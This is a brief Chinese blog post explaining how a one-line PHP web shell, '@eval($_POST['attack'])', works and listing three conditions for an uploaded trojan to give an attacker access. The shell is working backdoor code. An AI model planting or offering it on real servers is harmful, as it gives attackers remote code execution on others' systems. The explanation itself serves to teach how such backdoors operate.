大家好,又见面了,我是你们的朋友全栈君。
<?php @eval($_POST['attack']) ?>
@ 表示后面即使执行错误,也不报错
eval() 函数表示括号内的语句字符串什么的全都当做代码执行
$_POST[‘attack’] 表示从页面中获得attack这个参数值
只要攻击者满足这三条添加,就能实现入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/143202.html原文链接:https://javaforall.net